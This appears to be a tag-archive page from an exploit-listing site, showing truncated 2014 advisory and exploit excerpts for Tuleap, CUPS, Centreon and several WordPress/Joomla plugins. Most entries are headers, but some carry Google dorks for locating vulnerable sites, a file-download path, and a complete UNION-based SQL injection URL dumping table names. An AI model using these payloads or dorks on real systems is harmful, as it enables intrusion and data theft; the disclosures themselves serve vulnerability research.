Tags archives: unix

 

0

NuevoLabs flash player for clipshare SQL Injection

Nuevolabs Nuevoplayer for clipshare SQL Injection =======================================================================   :: ADVISORY SUMMARY :: Title: Nuevolabs Nuevoplayer for clipshare Sql Injection Vendor: NUEVOLABS (www.nuevolabs.com) Product: NUEVOPLAYER for clipshare Credits: Cory Marsh – protectlogic.com Discovery: 2014-10-10 Release: 2014-10-28   Nueovplayer is a popular flash video player with integration into multiple popular video sharing suites. The most notable is [...]

 

0

Tuleap 7.4.99.5 Remote Command Execution

Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap CVE: CVE-2014-7178 Vendor: Enalean Product: Tuleap Affected version: 7.4.99.5 and earlier Fixed version: 7.5 Reported by: Jerzy Kramarz   Details:   Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() [...]

 

0

Tuleap 7.2 XXE Injection

Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap CVE: CVE-2014-7177 Vendor: Enalean Product: Tuleap Affected version: 7.2 and earlier Fixed version: 7.4.99.5 Reported by: Jerzy Kramarz   Details:   A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow [...]

 

0

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap CVE: CVE-2014-7176 Vendor: Enalean Product: Tuleap Affected version: 7.4.99.5 and earlier Fixed version: 7.5 Reported by: Jerzy Kramarz   Details:   SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker [...]

 

0

CUPS Filter Bash Environment Variable Code Injection

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require ‘msf/core’ class Metasploit4 ‘CUPS Filter Bash Environment Variable Code Injection’, ‘Description’ => %q{ This module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically [...]

 

0

WordPress Download Manager Arbitrary File Download

# WordPress Download Manager Plugin – Arbitrary File Download # CWE: CWE-98 # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 25/10/2014 # Vendor Homepage: https://wordpress.org/plugins/download-manager/ # Tested on: Windows 7 and Gnu/Linux # Google Dork: inurl:/plugins/download-manager/   # VUL: /views/file_download.php?fname=   or:   /file_download.php?fname=   # PoC :   [...]

 

0

WordPress HTML5 / Flash Player SQL Injection

# WordPress HTML5 and FLash PLayer Plugin SQL Injection # CWE: CWE-89 # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 24/10/2014 # Vendor Homepage: https://wordpress.org/plugins/player/ # Tested on: Windows 7 and Gnu/Linux # Google Dork: inurl: “Index of” +inurl:/wp-content/plugins/player/   # PoC :   http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()– [...]

 

0

Centreon SQL / Command Injection

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Centreon SQL and Command Injection’, ‘Description’ => %q{ This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon Enterprise [...]

 

0

WordPress / Joomla Creative Contact Form 0.9.7 Shell Upload

#!/usr/bin/python # # Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability # Wordpress plugin version: <= 0.9.7 # Joomla extension version: <= 2.0.0 # # Vulnerability discovered by Gianni Angelozzi # # Exploit written by Claudio Viviani # # Dork google wordpress: inurl:inurl:sexy-contact-form # Dork google joomla : inurl:com_creativecontactform # # Tested [...]

 

0

WordPress CP Multi View Event Calendar 1.01 SQL Injection

######################   # Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability   # Exploit Author : Claudio Viviani   # Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip   # Date : 2014-10-23   # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap [...]